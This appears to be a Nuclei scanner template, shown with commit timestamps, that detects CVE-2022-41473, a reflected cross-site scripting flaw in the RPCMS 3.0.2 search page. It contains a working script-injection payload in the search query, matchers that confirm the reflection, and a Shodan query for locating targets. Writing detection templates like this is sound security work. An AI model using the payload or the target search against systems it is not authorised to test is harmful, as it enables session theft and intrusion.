2022-10-17 04:51:54 +00:00
id : CVE-2022-41473
info :
2022-10-19 21:11:27 +00:00
name : RPCMS 3.0.2 - Cross-Site Scripting
2022-10-17 04:51:54 +00:00
author : arafatansari
severity : medium
description : |
2022-10-19 21:11:27 +00:00
RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-17 04:51:54 +00:00
reference :
- https://github.com/ralap-z/rpcms/issues/1
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-41473
2022-10-17 11:14:50 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-41473
cwe-id : CWE-79
2022-10-17 04:51:54 +00:00
metadata :
shodan-query : http.html:"RPCMS"
2022-10-17 11:14:50 +00:00
verified : "true"
2022-10-17 07:28:48 +00:00
tags : cve,cve2022,rpcms,xss
2022-10-17 04:51:54 +00:00
requests :
2022-10-17 05:37:45 +00:00
- method : GET
path :
- "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-10-17 04:51:54 +00:00
matchers-condition : and
matchers :
2022-10-17 05:37:45 +00:00
- type : word
part : body
words :
- '<script>alert(document.domain)</script>'
- 'rpcms'
condition : and
- type : word
part : header
words :
- "text/html"
2022-10-17 04:51:54 +00:00
- type : status
status :
- 200
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/18